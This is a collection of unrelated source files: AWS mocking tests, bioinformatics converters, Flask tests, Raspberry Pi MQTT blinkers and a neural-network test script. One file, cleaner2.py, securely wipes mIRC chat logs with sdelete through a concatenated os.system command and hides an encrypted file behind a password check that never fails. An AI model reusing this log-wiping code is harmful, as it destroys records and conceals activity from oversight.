zip_output.seek(0)
return zip_output.read()
def create_invalid_lambda(role):
conn = boto3.client("lambda", _lambda_region)
zip_content = get_test_zip_file1()
function_name = str(uuid4())[0:6]
with pytest.raises(ClientError) as err:
conn.create_function(
FunctionName=function_name,
Runtime="python2.7",
Role=role,
Handler="lambda_function.handler",
Code={"ZipFile": zip_content},
Description="test lambda function",
Timeout=3,
MemorySize=128,
Publish=True,
)
return err
def get_role_name():
with mock_iam():
iam = boto3.client("iam", region_name=_lambda_region)
try:
return iam.get_role(RoleName="my-role")["Role"]["Arn"]
except ClientError:
return iam.create_role(
RoleName="my-role",
AssumeRolePolicyDocument="some policy",
Path="/my-path/",
)["Role"]["Arn"]
def wait_for_log_msg(expected_msg, log_group):
logs_conn = boto3.client("logs", region_name="us-east-1")
received_messages = []
start = time.time()
while (time.time() - start) < 30:
try:
result = logs_conn.describe_log_streams(logGroupName=log_group)
log_streams = result.get("logStreams")
except ClientError:
log_streams = None # LogGroupName does not yet exist
if not log_streams:
time.sleep(1)
continue
for log_stream in log_streams:
result = logs_conn.get_log_events(
logGroupName=log_group, logStreamName=log_stream["logStreamName"],
)
received_messages.extend(
[event["message"] for event in result.get("events")]
)
for line in received_messages:
if expected_msg in line:
return True, set(received_messages)
time.sleep(1)
return False, set(received_messages)
```
#### File: tests/test_rds/test_rds.py
```python
import boto3
import sure # noqa # pylint: disable=unused-import
import pytest
from moto import mock_rds
def test_deprecation_warning():
with pytest.warns(None) as record:
mock_rds()
str(record[0].message).should.contain(
"Module mock_rds has been deprecated, and will be repurposed in a later release"
)
@mock_rds
def test_get_databases_paginated():
conn = boto3.client("rds", region_name="us-west-2")
for i in range(51):
conn.create_db_instance(
AllocatedStorage=5,
Port=5432,
DBInstanceIdentifier="rds%d" % i,
DBInstanceClass="db.t1.micro",
Engine="postgres",
)
resp = conn.describe_db_instances()
resp["DBInstances"].should.have.length_of(50)
resp["Marker"].should.equal(resp["DBInstances"][-1]["DBInstanceIdentifier"])
resp2 = conn.describe_db_instances(Marker=resp["Marker"])
resp2["DBInstances"].should.have.length_of(1)
``` |
{
"source": "jimni/enrichment",
"score": 3
} |
#### File: jimni/enrichment/main.py
```python
from GenesLists import *
import argparse
import csv
# preset paths are used if no command line parameters are specified
metabolicListDirectory = '/Users/jim/Desktop/enrichment_maps_pathways/kegg_some'
completeListPath = '/Users/jim/Desktop/enrichment_maps_pathways/our_expressed.csv'
targetListPath = '/Users/jim/Desktop/enrichment_maps_pathways/target_68'
outFileName = 'result.csv'
conversionMapPath = 'resources/gene_id_name_map.csv'
# additional config
csvHeaderRow = [
"metabolic_name",
"complete_count",
"metabolic_clean_count",
"target_count",
"intersection_count",
"p_val_hypergeometric_score",
"gene_names"
]
def main():
# command line arguments parsing
parser = argparse.ArgumentParser(description='Specify command line parameters for metabolic, complete and target '
'gene id lists or preset correct paths in `main.py`. From each file '
'only the strings with integer numbers are used.')
parser.add_argument("-metabolics", "-m", dest="metabolicListDirectory",
help="path to folder with metabolic lists", default=metabolicListDirectory,
metavar="folder_path")
parser.add_argument("-complete", "-c", dest="completeListPath",
help="path to file with complete list", default=completeListPath, metavar="file_path")
parser.add_argument("-target", "-t", dest="targetListPath",
help="path to file with target list", default=targetListPath, metavar="file_path")
parser.add_argument("-out", "-o", dest="outFilePath",
help="path to file with result, defaults to `%%target_list_name%%_"+outFileName+"` "
"in target list folder", metavar="file_path")
args = parser.parse_args()
args.outFilePath = args.outFilePath or os.path.splitext(args.targetListPath)[0]+'_'+outFileName
# todo: make convert_ids_to_names optional
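    # Example invocation (paths are placeholders, not the presets above):
    #   python main.py -m ./kegg_pathways -c ./expressed_genes.csv -t ./target_genes -o ./result.csv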
# main body
complete = GeneList(args.completeListPath)
target = GeneList(args.targetListPath)
result = csv.writer(open(args.outFilePath, 'w'))
result.writerow(csvHeaderRow)
metabolic_file_list = [
os.path.join(args.metabolicListDirectory, fileName) for fileName in next(os.walk(args.metabolicListDirectory))[2]
]
metabolics = []
for fileName in metabolic_file_list:
metabolics.append(MetabolicList(fileName))
for metabolic in metabolics:
metabolic.intersect_with(complete)
metabolic.intersect_with(target)
metabolic.compute_hypergeometric_score(complete, target)
# metabolic.show(show_gene_ids=False)
metabolic.convert_ids_to_names(conversionMapPath, delimiter_char=';')
result.writerow([
metabolic.name,
complete.initialLength,
metabolic.afterIntersectionLength[0],
target.initialLength,
metabolic.afterIntersectionLength[-1],
"%.20f" % metabolic.hypergeometricScore,
' | '.join(metabolic.geneNames)
])
if __name__ == "__main__":
main()
``` |
{
"source": "jimni/gtf-to-csv-converter",
"score": 3
} |
#### File: jimni/gtf-to-csv-converter/gtf_to_csv.py
```python
from GTF import dataframe
import argparse
import os.path
def is_valid_file(argparser, arg):
if not os.path.exists(arg):
argparser.error("The file %s does not exist!" % arg)
else:
return arg
parser = argparse.ArgumentParser(description='Input GTF file and optional parameters')
parser.add_argument("-i", dest="infile", required=True,
help="input gtf file", metavar="INFILE",
type=lambda x: is_valid_file(parser, x))
parser.add_argument("-o", dest="outfile",
help="output csv file, defaults to `input file name`.csv", metavar="OUTFILE")
parser.add_argument("-columns", "-c", dest="columns", nargs="+",
help="list of columns to write to csv, e. g. `-columns column1 column2 column3`", metavar="COLUMN")
args = parser.parse_args()
args.outfile = args.outfile or os.path.splitext(args.infile)[0]+'.csv'
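# Example invocation (file names are placeholders; available columns depend on the GTF attributes present):
#   python gtf_to_csv.py -i annotation.gtf -o annotation.csv -columns seqname feature gene_id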
df = dataframe(args.infile)
print(" creating csv...")
df.to_csv(args.outfile, index=False, columns=args.columns)
print("SUCCESS: %s created." % args.outfile)
``` |
{
"source": "jim-nnamdi/Loanapplicant-salaryPredictor",
"score": 3
} |
#### File: Loanapplicant-salaryPredictor/loanpred_tests/PredTest.py
```python
from app import app
import unittest
# Initialize the class and then specify
# the Tear up and down method which would
# Actuate the tests based on core_demand
class PredictionTest(unittest.TestCase):
# Define the setup class to initialize the
# App class as a test Object during testing
def setUp(self):
self.app = app.test_client()
self.app.testing = True
# Define the teardown class to remove the
# App class as a test Object during testing
def tearDown(self):
pass
# Test that the homepage opens correctly on
# Accessing the Prediction page via_urls
def test_homepage_opens_correctly(self):
response = self.app.get('/')
self.assertEquals(response.status_code, 200)
# Test that the result page is opened correctly
# And that it has a POST request sent to it
def test_prediction_processes_post(self):
response = self.app.get('/result')
self.assertEquals(response.status_code, 200)
self.assertIsNot(response.status_code, 401)
# Test that if the results page returns empty
# results which is the data then the page should
# throw an exception error
def test_empty_dataset_is_not_processed(self):
data = { }
response = self.app.get('/result')
self.assertEquals(response.status_code, 403)
self.assertIsNone(response.data)
``` |
{
"source": "JimNtexas/cleaner",
"score": 3
} |
#### File: JimNtexas/cleaner/cleaner2.py
```python
import shutil
import os
import string
import argparse
from simplecrypt import encrypt, decrypt
#from Crypto.Hash import HMAC
#from Crypto.Hash import SHA256
#from Crypto.Cipher import AES
import binascii
import sys
import ntpath
import hashlib
global dbg, pwhash, src
src = ""
dbg = False
pwhash = "not a hash"
def dbg_print(txt):
if(dbg):
print(txt)
def check_pw(plain):
hash_object = hashlib.sha1(plain.encode('utf-8'))
hashed = hash_object.hexdigest()
dbg_print(hashed)
global pwhash
pwhash = hashed
return pwhash
def encryptfile(infile, outfile):
print('encryt this file' + infile);
fread = open(infile, mode='rb') #read the encrypted file
bytes = fread.read()
ciphertext = encrypt(pwhash, bytes) # decrypt returns bytes
fwrite = open(outfile, mode='wb')
fwrite.write(ciphertext)
return
def decryptfile(infile, outfile):
f = open(infile, mode='rb') #read the encrypted file
bytes = f.read()
plaintext = decrypt(pwhash, bytes)
f.close()
fw = open(outfile, 'wb')
fw.write(plaintext)
fw.close()
return
def path_leaf(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def getsrc():
global src
if (src == ""):
f = open('mi.bin','rb');
bytes = f.read()
src = decrypt(pwhash, bytes).decode('utf-8')
f.close()
return src
def clearDir(dirPath) :
file_path = ''
for the_file in os.listdir(dirPath):
file_path = os.path.join(dirPath, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
#elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception, e:
print e
return
def rmfile(tgt):
print('removing ' + tgt)
try:
os.remove(tgt)
except OSError:
print('rmfile error')
pass
#Main
parser = argparse.ArgumentParser()
parser.add_argument("cmd", help="hide or restore")
parser.add_argument("pw", nargs='?', default='', help="password")
parser.add_argument("--verbose", nargs='?', default=True, help="True or False")
args = parser.parse_args()
if(args.verbose is None):
dbg = True
print ('dbg:' + str(dbg))
def sdelete(tgt):
print('sdeleting ' + tgt)
os.system('sdelete -p 3 ' + tgt)
option = args.cmd
password = args.pw
while len(password) == 0:
password = raw_input('Enter password:')
if args.cmd not in ('hide', 'restore'):
print('hide or restore the file?')
exit(1)
if not check_pw(password) :
print("unable")
exit(1)
getsrc()
filename = ntpath.basename(src);
dbg_print('mode: ' + option)
if option == 'hide':
try:
# clearDir('C:/Users/Jim/AppData/Roaming/mIRC/channels')
# clearDir('C:/Users/Jim/AppData/Roaming/mIRC/logs')
sdelete('C:/Users/Jim/AppData/Roaming/mIRC/channels *.*')
sdelete('C:/Users/Jim/AppData/Roaming/mIRC/logs *.*')
dbg_print('delete:' + os.getcwd())
rmfile(filename) #delete any local copy
print('copy:' + src)
shutil.copyfile(src, os.getcwd()+'/'+filename)
print('copied ' + src)
rmfile(src) #remove the src file
except IOError as err:
print("I/O error: {0}".format(err))
exit(1)
print('hide succeeded')
if option == 'restore':
f = open('mdata.bin', mode='rb') #read the encrypted file
bytes = f.read()
plaintext = decrypt(pwhash, bytes) # decrypt returns bytes
f.close()
# the decrypted plaintext is bytes
fw = open('temp.txt', 'wb')
fw.write(plaintext)
fw.close()
dbg_print('deleting:' + getsrc())
rmfile( getsrc() ) #delete the original file
dbg_print( 'moving to ' + getsrc() )
shutil.move('temp.txt', getsrc())
dbg_print('Starting target')
os.startfile('C:\Users\Jim\ProgramFiles\mIRC\mirc.exe')
print("program exit")
``` |
{
"source": "jim-obrien-orig/gino",
"score": 2
} |
#### File: gino/ext/tornado.py
```python
import asyncio
import typing
import tornado
import tornado.ioloop
import tornado.iostream
import tornado.log
import tornado.platform.asyncio
import tornado.web
from sqlalchemy.engine.url import URL
from ..api import Gino as _Gino, GinoExecutor as _Executor
from ..engine import GinoConnection as _Connection, GinoEngine as _Engine
from ..strategies import GinoStrategy
if tornado.version_info[0] < 5:
raise Exception('Only Tornado 5 or later is supported')
class TornadoModelMixin:
@classmethod
async def get_or_404(cls, *args, **kwargs):
# noinspection PyUnresolvedReferences
rv = await cls.get(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class GinoExecutor(_Executor):
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class GinoConnection(_Connection):
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class GinoEngine(_Engine):
connection_cls = GinoConnection
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
class TornadoStrategy(GinoStrategy):
name = 'tornado'
engine_cls = GinoEngine
TornadoStrategy()
class Gino(_Gino):
"""
Base class for GINO database.
Using this class as a metadata for your database adds an additional
``get_or_404()`` method to all of your table classes.
"""
model_base_classes = _Gino.model_base_classes + (TornadoModelMixin,)
query_executor = GinoExecutor
if typing.TYPE_CHECKING:
# Typehints to enable autocompletion on all Gino.Model-derived classes
from ..crud import CRUDModel as __CRUDModel
from ..declarative import ModelType as __ModelType
class Model(__CRUDModel, TornadoModelMixin, metaclass=__ModelType):
...
async def first_or_404(self, *args, **kwargs):
rv = await self.first(*args, **kwargs)
if rv is None:
raise tornado.web.HTTPError(404)
return rv
async def set_bind(self, bind, loop=None, **kwargs):
kwargs.setdefault('strategy', 'tornado')
return await super().set_bind(bind, loop=loop, **kwargs)
async def init_app(self, app, *, loop=None, dsn='', driver='asyncpg',
host='localhost', port=5432,
user='postgres', password='', database='postgres',
echo=False, pool_min_size=5, pool_max_size=10,
ssl=None, **kwargs):
"""
Initialize database
:param app: tornado.web.Application
:param loop: User-defined event loop. If not defined, tornado default
loop will be used.
:param driver: the database driver, default is ``asyncpg``.
:param host: database server host, default is ``localhost``.
:param port: database server port, default is ``5432``.
:param user: database server user, default is ``postgres``.
:param password: database server password, default is empty.
:param database: database name, default is ``postgres``.
:param dsn: a SQLAlchemy database URL to create the engine, its
existence will replace all previous connect arguments.
:param echo: enable SQLAlchemy echo mode.
:param pool_min_size: the initial number of connections of the db
pool, default is ``5``.
:param pool_max_size: the maximum number of connections in the db
pool, default is ``10``.
:param ssl: SSL context passed to ``asyncpg.connect``, default is
``None``. This can be ``True`` or an instance of ``ssl.SSLContext``.
:param kwargs: other parameters passed to the specified dialects,
like ``asyncpg``. Unrecognized parameters will cause exceptions.
"""
if loop is None:
loop = tornado.ioloop.IOLoop.current()
if isinstance(loop, tornado.platform.asyncio.BaseAsyncIOLoop):
asyncio_loop = loop.asyncio_loop
elif isinstance(loop, asyncio.BaseEventLoop):
asyncio_loop = loop
else:
raise RuntimeError('AsyncIOLoop is required to run GINO')
if not dsn:
dsn = URL(
drivername=driver, host=host, port=port, username=user,
password=password, database=database,
)
await self.set_bind(
dsn, echo=echo, min_size=pool_min_size, max_size=pool_max_size,
ssl=ssl, loop=asyncio_loop, **kwargs,
)
app.db = self
class DBMixin:
"""
A mixin for tornado.web.Application to initialize and have convenience
methods for database accesses.
"""
db = None # type: Gino
async def init_db(self: [tornado.web.Application, 'DBMixin'],
db: Gino, **kwargs):
await db.init_app(self, **kwargs)
class RequestHandlerMixin:
"""
A mixin to provide convenience methods to access GINO object
"""
@property
def db(self: tornado.web.RequestHandler) -> Gino:
return self.application.db
``` |
{
"source": "jim-obrien-orig/mlv-tools-tutorial",
"score": 3
} |
#### File: jim-obrien-orig/mlv-tools-tutorial/modify_input_data.py
```python
import codecs
import pickle
from os.path import dirname, join
from sklearn.utils import shuffle
cache_path = join(dirname(__file__), 'poc', 'data', '20news-bydate_py3.pkz')
def shuffle_data(subset: str, cache):
cache[subset].data, cache[subset].target, cache[subset].filenames = shuffle(cache[subset].data,
cache[subset].target,
cache[subset].filenames)
with open(cache_path, 'rb') as f:
compressed_content = f.read()
uncompressed_content = codecs.decode(compressed_content, 'zlib_codec')
cache = pickle.loads(uncompressed_content)
shuffle_data('train', cache)
shuffle_data('test', cache)
compressed_content = codecs.encode(pickle.dumps(cache), 'zlib_codec')
with open(cache_path, 'wb') as f:
f.write(compressed_content)
```
#### File: project/classifier/helper.py
```python
import json
from os import makedirs
from os.path import dirname
from typing import List
def write_json(json_file: str, data: dict):
"""
Create parent directories if not exist.
Write the json file.
"""
makedirs(dirname(json_file), exist_ok=True)
with open(json_file, 'w') as fd:
json.dump(data, fd)
def write_lines_file(file_path: str, data_list: List[str]):
"""
Create parent directories if not exist.
Write the file line by line.
"""
makedirs(dirname(file_path), exist_ok=True)
with open(file_path, 'w') as fd:
fd.writelines(['{}{}'.format(line, '' if line.endswith('\n') else '\n') for line in data_list])
```
#### File: project/classifier/pre_process.py
```python
from typing import Tuple, List
from nltk import wordpunct_tokenize
def tokenize_and_clean_text(text: str) -> str:
return ' '.join([token.lower() for token in wordpunct_tokenize(text)
if token.isalpha() and token.lower()])
def clean_formatting(text: List[str]) -> str:
return tokenize_and_clean_text(' '.join(text))
def preprocess_data(extracted_data: List[Tuple[str, str]]) -> List[str]:
"""
Transform data to get compliant with fasttext expected
format: __label__[label] [text]
"""
return [f'__label__{data[0]} {clean_formatting(data[1])}' for data in extracted_data]
``` |
{
"source": "jimoconnell/electrobrain",
"score": 3
} |
#### File: jimoconnell/electrobrain/makermorse.py
```python
dit = 0.25
dah = 3 * dit
lettergap = 3 * dit
wordgap = 7 * dit
# Set which pin you will be connecting LED or sounder to:
# ( BCM Numbering )
signalPin = 25
# Your preferred MQTT Server and topic:
mqttServer = "iot.eclipse.org"
mqttTopic = "test/abcd"
# End of User Settings
#################################################
import paho.mqtt.client as mqtt
import RPi.GPIO as GPIO # always needed with RPi.GPIO
from time import sleep # pull in the sleep function from time module
import time as time
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM) # choose BCM or BOARD numbering schemes. I use BCM
# set signalPin (set above) as output for led or sounder
GPIO.setup(signalPin, GPIO.OUT)# set signalPin (set above) as output for led
CODE = {' ': ' ',
"'": '.----.',
        '(': '-.--.',
')': '-.--.-',
',': '--..--',
'-': '-....-',
'.': '.-.-.-',
'/': '-..-.',
'0': '-----',
'1': '.----',
'2': '..---',
'3': '...--',
'4': '....-',
'5': '.....',
'6': '-....',
'7': '--...',
'8': '---..',
'9': '----.',
':': '---...',
';': '-.-.-.',
'?': '..--..',
'!': '---.',
'A': '.-',
'B': '-...',
'C': '-.-.',
'D': '-..',
'E': '.',
'F': '..-.',
'G': '--.',
'H': '....',
'I': '..',
'J': '.---',
'K': '-.-',
'L': '.-..',
'M': '--',
'N': '-.',
'O': '---',
'P': '.--.',
'Q': '--.-',
'R': '.-.',
'S': '...',
'T': '-',
'U': '..-',
'V': '...-',
'W': '.--',
'X': '-..-',
'Y': '-.--',
'Z': '--..',
'_': '..--.-'}
# Not sure how to include these, as they conflict with letter.upper()
# 'Ä': '.-.-',
# 'Á': '.--.-',
# 'Å': '.--.-',
# 'Ch': ' ----',
# 'É': '..-..',
# 'Ñ': '--.--',
# 'Ö': '---.',
# 'Ü': '..--'}
def dot():
# print(".")
GPIO.output(signalPin,1)
time.sleep(dit)
GPIO.output(signalPin,0)
time.sleep(dit)
def dash():
# print("_")
GPIO.output(signalPin,1)
time.sleep(dah)
GPIO.output(signalPin,0)
time.sleep(dit)
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected to:\n\t "+mqttServer+":/"+mqttTopic+"\nwith result code: "+str(rc))
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe(mqttTopic)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
    print(msg.topic+" "+str(msg.payload))
    # paho delivers the payload as bytes; decode it so the Morse table lookup
    # below sees plain characters instead of the repr of a bytes object
    input = msg.payload.decode("utf-8")
    print(input)
for letter in input:
for symbol in CODE[letter.upper()]:
if symbol == '-':
dash()
elif symbol == '.':
dot()
else:
time.sleep(lettergap)
time.sleep(wordgap)
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect(mqttServer, 1883, 60)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever()
```
#### File: jimoconnell/electrobrain/MessageBlinker.py
```python
import paho.mqtt.client as mqtt
# Rpi.GPIO is the library that lets us talk to the GPIO pins
import RPi.GPIO as GPIO # always needed with RPi.GPIO
# We use sleep(), so let's import it
from time import sleep # pull in the sleep function from time module
GPIO.setmode(GPIO.BCM) # choose BCM or BOARD numbering schemes. I use BCM
GPIO.setup(25, GPIO.OUT)# set GPIO 25 as output for white led
GPIO.setup(24, GPIO.OUT)# set GPIO 25 as output for white led
# The callback for when the client receives a CONNACK response from the server.
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc))
#Ask the user what topic they want to watch:
topic = raw_input("Type a topic/channel:\n")
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe(topic)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
# Blink some lights when a message is received:
GPIO.output(25,True)
sleep(.05)
GPIO.output(25,False)
sleep(.1)
GPIO.output(24,True)
sleep(.1)
GPIO.output(24,False)
sleep(.1)
GPIO.output(25,True)
sleep(.05)
GPIO.output(25,False)
# wait for new messages:
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("iot.eclipse.org", 1883, 60)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever()
```
#### File: jimoconnell/electrobrain/notify.py
```python
import pyinotify
import RPi.GPIO as GPIO
import time
mypin = 24
# Use physical pin numbers
#GPIO.setmode(GPIO.BOARD)
GPIO.setmode(GPIO.BCM) # choose BCM or BOARD numbering schemes. I use BCM
# Set up header pin 11 (GPIO11) as an input
print "Setup Pin 24"
GPIO.setup(mypin, GPIO.OUT)
wm = pyinotify.WatchManager() # Watch Manager
mask = pyinotify.IN_ACCESS #This monitors any access on files and folders in the dir
class EventHandler(pyinotify.ProcessEvent):
def process_IN_ACCESS(self, event):
print "Accessed:", event.pathname
#Lights on n off at varied intervals
var=1
while var==1 :
print "Set Output False"
GPIO.output(mypin, True)
time.sleep(0.5)
print "Set Output False"
GPIO.output(mypin, False)
time.sleep(0.5)
print "Set Output False"
GPIO.output(mypin, True)
time.sleep(0.5)
print "Set Output False"
GPIO.output(mypin, False)
time.sleep(0.5)
break
handler = EventHandler()
notifier = pyinotify.Notifier(wm, handler)
#Folder to monitor
wdd = wm.add_watch('/var/www', mask, rec=True)
notifier.loop()
``` |
{
"source": "JimOhman/differentiable-neural-computers",
"score": 2
} |
#### File: JimOhman/differentiable-neural-computers/test.py
```python
from utils import get_optimizer, get_loss_function, make_copy_repeat_dataset, make_dirs, get_accuracy
from train import unroll_through_time
import matplotlib.pyplot as plt
from core import Controller
from tqdm import tqdm
import numpy as np
import random
import torch
import os
from collections import defaultdict
from matplotlib import animation
def update_memory_state(controller, memory_state):
memory_state['allocation_gate'].append(controller.memory.gates['allocation_gate'][0, 0])
memory_state['free_gate'].append(controller.memory.gates['free_gate'][0, 0])
memory_state['write_weights'].append(controller.memory.write_weights[0].view(-1))
memory_state['read_weights'].append(controller.memory.read_weights[0].view(-1))
return memory_state
def init_visualization(time_steps, args):
init = {}
init['input and target'] = torch.zeros(args.pattern_width, time_steps)
init['output'] = torch.zeros(args.pattern_width, time_steps)
init['free_gate'] = torch.zeros(args.num_reads, time_steps)
init['allocation_gate'] = torch.zeros(args.num_writes, time_steps)
init['write_weights'] = torch.zeros(args.num_writes*args.capacity, time_steps)
init['read_weights'] = torch.zeros(args.num_reads*args.capacity, time_steps)
images = {}
def add_subplot(title, gridspec, xmax, vmin=0, vmax=1, cmap='gray', aspect='equal'):
ax = fig.add_subplot(gridspec)
ax.set_title(title, fontsize=10, color='white')
ax.set_xlim(xmin=0, xmax=xmax)
images[title] = ax.imshow(init[title], cmap=cmap, vmin=vmin, vmax=vmax, aspect=aspect)
ax.grid('off')
ax.axis('off')
nwc, nrc = 2*args.num_writes, 2*args.num_reads
fig = plt.figure(constrained_layout=True, figsize=args.figsize)
gs = fig.add_gridspec(2 + nwc + nrc, 2, width_ratios=[1, 1])
xmax = time_steps - 1
add_subplot('input and target', gs[0, 0], xmax, aspect='auto')
add_subplot('output', gs[0, 1], xmax, cmap='gist_heat', aspect='auto')
add_subplot('write_weights', gs[1:1+nwc, 0], xmax, cmap='gist_heat', aspect='auto')
add_subplot('read_weights', gs[1+nwc:1+nwc+nrc, 0], xmax, cmap='gist_heat', aspect='auto')
add_subplot('free_gate', gs[1+nwc:1+nwc+nrc, 1], xmax, cmap='gist_heat', aspect='equal')
add_subplot('allocation_gate', gs[1:1+nwc, 1], xmax, cmap='gist_heat', aspect='equal')
fig.patch.set_facecolor('black')
fig.patch.set_alpha(0.8)
return fig, images
def update_figure(inputs, targets, outputs, mask, images, memory_state, args):
input_and_target = 0.5*inputs[:, 0].T + targets[:, 0].T
images['input and target'].set_data(input_and_target)
outputs = torch.cat(outputs)
if args.use_mask and not args.ignore_mask:
outputs *= mask
if args.round:
outputs = outputs.round()
images['output'].set_data(outputs.T)
allocation_gate = torch.stack(memory_state['allocation_gate'], dim=1)
free_gate = torch.stack(memory_state['free_gate'], dim=1)
write_weights = torch.stack(memory_state['write_weights'], dim=1)
read_weights = torch.stack(memory_state['read_weights'], dim=1)
images['allocation_gate'].set_data(allocation_gate)
images['free_gate'].set_data(free_gate)
images['write_weights'].set_data(write_weights)
images['read_weights'].set_data(read_weights)
def visualize_training(args):
states = []
all_nets = os.listdir(args.saves_dir)
filtered_nets = [net for net in all_nets if (args.start_net <= int(net) <= args.end_net)]
for net in sorted(filtered_nets, key=int)[::args.skip+1]:
path = os.path.join(args.saves_dir, net)
state = torch.load(path, map_location=torch.device('cpu'))
state = insert_args(args, state)
state['args'].batch_size = 1
states.append(state)
controller = Controller(state['args'])
device = torch.device('cpu')
dataset = make_copy_repeat_dataset(state['args'])
loader_params = {'batch_size': 1,
'shuffle': True,
'num_workers': 0,
'drop_last': True}
dataset = torch.utils.data.DataLoader(dataset, **loader_params)
with torch.inference_mode():
batch_idx = 0
for inputs, targets, mask in dataset:
inputs = inputs.transpose(0, 1)
targets = targets.transpose(0, 1)
mask = mask.transpose(0, 1)
if args.minimize:
time_steps, _ = torch.nonzero(mask, as_tuple=True)
time_steps = time_steps.max().item()
inputs = inputs[:time_steps, :]
targets = targets[:time_steps, :]
mask = mask[:time_steps, :]
else:
time_steps = inputs.shape[0]
fig, images = init_visualization(time_steps, state['args'])
def animate(i):
state = states[i]
controller.load_state_dict(state['weights'])
outputs = []
memory_state = defaultdict(list)
for t in range(time_steps):
output = controller(inputs[t, :])
outputs.append(output.squeeze(1))
memory_state = update_memory_state(controller, memory_state)
update_figure(inputs, targets, outputs, mask, images, memory_state, state['args'])
controller.memory.reset(device)
return []
animation_params = {'frames': len(states),
'interval': args.sleep,
'blit': True,
'repeat': args.repeat}
anim = animation.FuncAnimation(fig, animate, **animation_params)
plt.show()
if args.save_as_gifs:
gifs_folder = os.path.join(os.path.split(args.saves_dir)[0], 'gifs')
gif_path = os.path.join(gifs_folder, '{}.gif'.format(batch_idx))
os.makedirs(gifs_folder, exist_ok=True)
anim.save(gif_path, writer='imagemagick', fps=60)
batch_idx += 1
def insert_args(args, state):
if args.num_patterns is not None:
state['args'].num_patterns = args.num_patterns
if args.min_pattern_length is not None:
state['args'].min_pattern_length = args.min_pattern_length
if args.max_pattern_length is not None:
state['args'].max_pattern_length = args.max_pattern_length
if args.min_repeats is not None:
state['args'].min_repeats = args.min_repeats
if args.max_repeats is not None:
state['args'].max_repeats = args.max_repeats
if args.num_sequences is not None:
state['args'].num_sequences = args.num_sequences
state['args'].batch_size = args.batch_size
state['args'].ignore_mask = args.ignore_mask
state['args'].visualize = args.visualize
state['args'].sleep = args.sleep
state['args'].figsize = args.figsize
if args.seed:
state['args'].data_seed = args.seed
state['args'].round = args.round
assert state['args'].max_pattern_length >= state['args'].min_pattern_length
assert state['args'].max_repeats >= state['args'].min_repeats
return state
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
test = parser.add_argument_group('test')
test.add_argument('--saves_dir', type=str, default='',
help='The directory where the models are saved.')
test.add_argument('--net', type=int, default=None,
help='The filename for the saved model if not --visualize.')
test.add_argument('--seed', type=int, default=0,
help='The seed for the data loader.')
test.add_argument('--batch_size', type=int, default=1,
help='The amount of sequences per batch.')
test.add_argument('--gpu', action='store_true',
help='Run on default GPU if not --visualize.')
patterns = parser.add_argument_group('patterns')
patterns.add_argument('--num_sequences', type=int, default=None,
help='Amount of sequences in the dataset.')
patterns.add_argument('--min_pattern_length', type=int, default=None,
help='Amount of sequences in the dataset.')
patterns.add_argument('--max_pattern_length', type=int, default=None,
help='Min length of a pattern.')
patterns.add_argument('--num_patterns', type=int, default=None,
help='Max length of a pattern.')
patterns.add_argument('--min_repeats', type=int, default=None,
help='Min amount of repeats for each pattern.')
patterns.add_argument('--max_repeats', type=int, default=None,
help='Max amount of repeats for each pattern.')
visualize = parser.add_argument_group('visualize')
visualize.add_argument('--visualize', action='store_true',
help='Specify to visualize the training process.')
visualize.add_argument('--ignore_mask', action='store_true',
help='Ignore mask in visualization if used during training.')
visualize.add_argument('--save_as_gifs', action='store_true',
help='Save the visualization as a gif.')
visualize.add_argument('--start_net', type=int, default=0,
help='Start visualization from this training step.')
visualize.add_argument('--end_net', type=int, default=np.inf,
help='End visualization at this training step.')
visualize.add_argument('--skip', type=int, default=0,
help='Skip this amount of saved models during visualization.')
visualize.add_argument('--round', action='store_true',
help='Round the output of the network during visualization.')
visualize.add_argument('--sleep', type=int, default=0,
help='Sleep this amount in milliseconds with each step.')
visualize.add_argument('--figsize', nargs=2, type=int, default=None,
help='Specify the figure size.')
visualize.add_argument('--minimize', action='store_true',
help='Remove padding for visualization.')
visualize.add_argument('--repeat', action='store_true',
help='Repeat visualization.')
args = parser.parse_args()
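    # Example invocations (directory and step numbers are placeholders):
    #   python test.py --saves_dir runs/saves --net 5000 --batch_size 4
    #   python test.py --saves_dir runs/saves --visualize --minimize --round --skip 4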
assert args.start_net <= args.end_net
if args.net is not None:
args.start_net = args.net
args.end_net = args.net
if not args.visualize:
path = os.path.join(args.saves_dir, str(args.net))
state = torch.load(path, map_location=torch.device('cpu'))
state = insert_args(args, state)
controller = Controller(state['args'])
controller.load_state_dict(state['weights'])
device = torch.device('cuda' if args.gpu else 'cpu')
controller.to(device)
dataset = make_copy_repeat_dataset(state['args'])
loader_params = {'batch_size': args.batch_size,
'shuffle': True,
'num_workers': 0,
'drop_last': True}
dataset = torch.utils.data.DataLoader(dataset, **loader_params)
loss_function = get_loss_function(state['args'])
with torch.inference_mode():
for inputs, targets, mask in dataset:
inputs = inputs.to(device)
targets = targets.to(device)
mask = mask.to(device)
info = unroll_through_time(controller, loss_function, inputs, targets, mask, state['args'])
outputs, loss, accuracy = info
controller.memory.reset(device)
loss = loss.cpu().item()
accuracy = accuracy.cpu().item()
